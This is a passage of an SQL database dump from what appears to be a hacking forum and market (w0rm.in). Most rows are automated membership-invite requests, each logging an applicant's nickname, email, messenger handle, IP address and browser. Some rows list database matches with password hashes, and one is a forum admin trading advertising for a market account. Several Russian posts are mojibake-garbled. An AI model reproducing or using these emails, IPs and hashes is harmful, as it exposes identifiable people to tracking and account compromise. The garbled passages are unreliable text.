Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Test : test@test.com : 80.93.122.2 : bb5a3fcb975122642d8a9f59608c01a9\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://test.org.ua | test.org.ua \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1570, 1421, 0, 'Invite', 2, '{$name}', 1407928260, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@123.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1575, 1427, 0, 'Invite', 2, '{$name}', 1407932686, '[SIZE=\'4\'][COLOR=\'Sienna\']masterseeker[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: mstseeker@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.165.222.245\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://masterseeker.findmysoft.com | masterseeker.findmysoft.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1573, 1423, 0, 'Invite', 2, 'opensc', 1407931033, '[SIZE=\'4\'][COLOR=\'Sienna\']opensc[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: opensc@jabbim.com\n[b]e-mail[/b]: admin@opensc.ws\n[b]Info[/b]: Привет,\r\n\r\nЯ админ форума opensc.ws. У меня есть предложение насчет маркета w0rm.in. Готов предложить рекламу твоего ресурса на нашем форуме за акк на w0rm.in. Можем разместить сразу большой баннер в шапку форума. Жду ответа. \r\n\r\nАдминистратор opensc.ws.\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 91.108.183.34\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://opensc.org | opensc.org \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1574, 1425, 0, 'lumbricus', 39, 'Job Offering - Looking for Advanced Web App Security Testers - JSP/PHP/ASP.net', 1407931545, '/close thread*', 1, 0, '', 0, 1, 0, 0, 0),
(1673, 1490, 1670, 'ropertus', 33, '', 1408369801, 'The first site is not working?', 1, 1, '', 0, 1, 0, 0, 0),
(1674, 1493, 0, 'Invite', 2, '{$name}', 1408370618, '[SIZE=\'4\'][COLOR=\'Sienna\']Daikokuten[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 640C407282\n[b]e-mail[/b]: josete100@hotmail.es\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 200.35.149.224\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://daikokuten.pro | daikokuten.pro \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1576, 1428, 0, 'Invite', 2, '{$name}', 1407934157, '[SIZE=\'4\'][COLOR=\'Sienna\']staph_x[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: staph_x@xmpp.jp\n[b]e-mail[/b]: staph_x@mail.com\n[b]Info[/b]: Все время изучаю программирование, у меня опыт с большими CMS и люблю найти уязвимости в них. До сих пор у меня нет релизов, но я хочу улучшить свою способность до того как я уверен что я могу писать достойный проект. Город рождения Брянск (Слава Партизанам!), но долго живу за граница (уже лет 20). У меня профили на вф, коровка, монополи, експлойт, и другие. \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 185.41.140.20\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://staph-x.blogspot.com | staph-x.blogspot.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1577, 1429, 0, 'Invite', 2, '{$name}', 1407935943, '[SIZE=\'4\'][COLOR=\'Sienna\']phiA[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: root@pasuruanblackhat.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 180.253.74.150\n[*][b]real ip[/b]: 180.253.74.150\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://phia.com | phia.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1578, 1430, 0, 'Invite', 2, '{$name}', 1407936030, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: dicks@dicks.dicks\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 94.102.52.76\n[*][b]real ip[/b]: 94.102.52.76\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1579, 1431, 0, 'Invite', 2, '{$name}', 1407936925, '[SIZE=\'4\'][COLOR=\'Sienna\']FBI[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: fbi@fbi.gov\n[b]e-mail[/b]: fbi@fbi.gov\n[b]Info[/b]: No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 94.102.52.76\n[*][b]real ip[/b]: 94.102.52.76\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : FBI : foto1986@list.ru : 87.244.187.183 : c06e0ef89e871eeadeec041e3d1a8380\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://fbi.gov | fbi.gov \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1580, 1432, 0, 'Invite', 2, '{$name}', 1407938919, '[SIZE=\'4\'][COLOR=\'Sienna\']samirsamo[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: samirsamo\n[b]e-mail[/b]: samirsamo1337@fbi.al\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 80.78.68.141\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://idealdesigner.net/forums/user/11277-samirsamo/ | http://idealdesigner.net/forums/user/11277-samirsamo/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1581, 1064, 1073, 'w0rm', 1, '', 1407939411, '[url]http://www.eia.gov/[/url] +1', 1, 0, '', 0, 1, 0, 0, 0),
(1582, 1433, 0, 'Invite', 2, '{$name}', 1407942450, '[SIZE=\'4\'][COLOR=\'Sienna\']joeroot[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: j0er00t@exploit.im/691768633\n[b]e-mail[/b]: exploitinc0x0@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 175.110.71.56\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/joeroot05 | https://twitter.com/joeroot05 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1583, 1434, 0, 'Invite', 2, '{$name}', 1407942586, '[SIZE=\'4\'][COLOR=\'Sienna\']hazret-i fahişe[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: kutsalcoder@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 212.156.71.6\n[*][b]real ip[/b]: 212.156.71.6\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://dinikaynak.blogspot.com/.../abdesti-bozan-seyler.html | http://dinikaynak.blogspot.com/.../abdesti-bozan-seyler.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1584, 1435, 0, 'Invite', 2, '{$name}', 1407945340, '[SIZE=\'4\'][COLOR=\'Sienna\']qsder[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: lucas.toriello@laposte.net\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 92.130.236.22\n[*][b]real ip[/b]: 92.130.236.22\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://qsder.deviantart.com | qsder.deviantart.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1585, 1436, 0, 'w0rm', 1, 'äþруü ÑÂúÑÂÿþртð ò market', 1407945629, 'Ãâ€Ã¾ÑÂтуÿõý тþûьúþ учðÑÂтýøúðü úþüðýôы, òÑÂõ ôðýýыõ ÑÂúûðôыòðõü ò ÑÂþþтòõтÑÂтòующøõ рð÷ôõûы - ò ÿþÑÂûõôÑÂтòøø ÿõрõýõÑÂу ò üðóð÷øý.\r\nâðú-öõ òыÑÂтðòûõýýы ÿрðòð òÑÂõü ÿþûь÷þòðтõÃȄÂü ò ÑÂþþтòõтÑÂтòøõ ѠðúтøòýþÑÂтью.\r\n[url]http://w0rm.in:8888/forumdisplay.php?f=19[/url]', 1, 0, '', 0, 1, 0, 0, 0),
(1588, 1439, 0, 'Invite', 2, '{$name}', 1408103209, '[SIZE=\'4\'][COLOR=\'Sienna\']petrov[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: petrov11@jabber.kz\n[b]e-mail[/b]: petrov11@mail.kz\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 91.229.77.92\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/Udraletsontour | https://twitter.com/Udraletsontour \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1590, 1440, 0, 'Invite', 2, '{$name}', 1408104232, '[SIZE=\'4\'][COLOR=\'Sienna\']Jsmitty[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: jsmitty@reallymymail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 31.54.123.101\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1591, 1441, 0, 'Invite', 2, '{$name}', 1408104238, '[SIZE=\'4\'][COLOR=\'Sienna\']Jsmitty[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: jsmitty@reallymymail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 31.54.123.101\n[*][b]real ip[/b]: 31.54.123.101\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1592, 1018, 1021, '123', 41, '', 1408104457, 'ýõ ÑÂтðû ñы ѠôþòõрÑÂть тðúþüу рутúøту, þý ôрõòýøù úðú ýõ ÷ýðю чтþ )', 1, 0, '', 0, 1, 0, 0, 0),
(1593, 1442, 0, 'Invite', 2, '{$name}', 1408104764, '[SIZE=\'4\'][COLOR=\'Sienna\']DatApple[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: conslight@jabbim.cz\n[b]e-mail[/b]: conslight2@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.50.236.60\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) 